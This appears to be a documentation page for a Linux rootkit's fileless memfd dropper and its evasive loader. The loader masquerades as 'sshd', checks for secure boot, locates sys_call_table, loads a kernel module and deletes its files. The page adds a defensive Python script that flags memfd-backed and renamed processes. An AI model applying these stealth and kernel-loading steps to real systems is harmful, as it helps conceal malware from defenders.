Stage 1: Fileless Memfd Dropper

  1. We call
         fd_loader = memfd_create("loader", MFD_CLOEXEC);
         fd_target = memfd_create("target", MFD_CLOEXEC);
     to get two anonymous file descriptors.
  2. We write() our embedded ELF blobs into each fd.
  3. We fork():
     • Child: redirect stdout/stderr to /dev/null, then
         execveat(fd_loader, NULL, argv_loader, envp, AT_EMPTY_PATH);
     • Parent: waitpid(), then
         execveat(fd_target, NULL, argv_target, envp, AT_EMPTY_PATH);

execveat() with AT_EMPTY_PATH executes the program behind an already-open file descriptor, so neither ELF ever needs a path on disk.


Stage 2: Environment-Aware Loader

  1. We rename our process to “sshd” via
         prctl(PR_SET_NAME, "sshd", 0, 0, 0);
  2. We scan dmesg for “Secure boot” strings. If found, we abort.
  3. We drop a helper script /tmp/loader.sh that:
    • Uses file + grep to detect gzip/xz/bz2/lz4/zstd.
    • Runs tail -c +<offset> piped into the matching decompressor, writing the result to /tmp/vmlinux.
  4. In loader.c, we open /tmp/vmlinux and call:
         sys_call_table = (void **)kallsyms_lookup_name("sys_call_table");
  5. We load our kernel module by creating another memfd for puma.ko and calling:
         finit_module(fd_puma_ko, "", 0);
  6. Finally, we remove /tmp/loader.sh and /tmp/vmlinux.
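Both stages leave host-side traces that a defender can check for: Stage 1 runs from an anonymous memfd, so /proc/<pid>/exe points at "/memfd:..." rather than a real path, and Stage 2 renames the process to "sshd" with prctl(PR_SET_NAME), so /proc/<pid>/comm no longer matches the executable. The following triage script is an added example written for this page, not code from the rootkit or its repository; the /proc readings in SAMPLE are constructed to illustrate what such a host could look like, and the finding labels are my own.

```python
"""Triage check for memfd-backed executables and comm/exe mismatches.

Added example (not part of the rootkit source). It reads two procfs
entries per process: the /proc/<pid>/exe symlink target and the
/proc/<pid>/comm name, and flags the indicators described above.
"""
import os
import re

# A process exec'd from a memfd has an exe link such as
# "/memfd:loader (deleted)"; the prefix is fixed by the kernel.
MEMFD_RE = re.compile(r"^/memfd:")


def assess(exe_target, comm):
    """Return a list of finding labels for one process.

    exe_target: result of readlink("/proc/<pid>/exe")
    comm:       contents of /proc/<pid>/comm, stripped of its newline
    """
    findings = []
    if MEMFD_RE.match(exe_target):
        findings.append("exe-is-memfd")
    if exe_target.endswith(" (deleted)"):
        findings.append("exe-unlinked")
    # Derive the executable's own name and compare it with comm. comm is
    # truncated to 15 bytes by the kernel, so only a prefix is compared.
    base = os.path.basename(exe_target.replace(" (deleted)", ""))
    if base.startswith("memfd:"):
        base = base[len("memfd:"):]
    if comm and not base.startswith(comm[:15]):
        # Heuristic: some legitimate daemons also rename themselves, so
        # treat this as a lead to review rather than proof on its own.
        findings.append("comm-mismatch")
    return findings


def scan_proc(proc="/proc"):
    """Walk a live procfs tree and return {pid: findings} for flagged PIDs."""
    flagged = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc, entry, "exe"))
            with open(os.path.join(proc, entry, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # kernel threads, races with exit, or no permission
        found = assess(exe, comm)
        if found:
            flagged[int(entry)] = found
    return flagged


# Constructed sample (not captured from a real host) of what the two
# staging processes and two ordinary daemons would look like in /proc.
SAMPLE = [
    (4120, "/memfd:loader (deleted)", "sshd"),    # Stage 2 loader, renamed
    (4121, "/memfd:target (deleted)", "target"),  # Stage 1 target binary
    (812, "/usr/sbin/sshd", "sshd"),              # the real sshd
    (1, "/usr/lib/systemd/systemd", "systemd"),
]


def triage(sample=SAMPLE):
    """Apply assess() to a list of (pid, exe_target, comm) tuples."""
    result = {}
    for pid, exe, comm in sample:
        found = assess(exe, comm)
        if found:
            result[pid] = found
    return result


if __name__ == "__main__":
    for pid, found in sorted(triage().items()):
        print(f"pid {pid}: {', '.join(found)}")
```

Run it as root (or with CAP_SYS_PTRACE) to read other users' exe links; call scan_proc() instead of triage() for a live host. A memfd-backed exe with a "sshd" comm is the combination this page describes, while either indicator alone is a lead that needs further review.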

Code Locations

  • rootkit/dropper/dropper.c
  • rootkit/loader/loader.c & rootkit/loader/loader.sh

Quick Test

  ./rootkit/dropper/cron
  dmesg | grep "PUMA is compatible"
  dmesg | grep "PUMA loaded"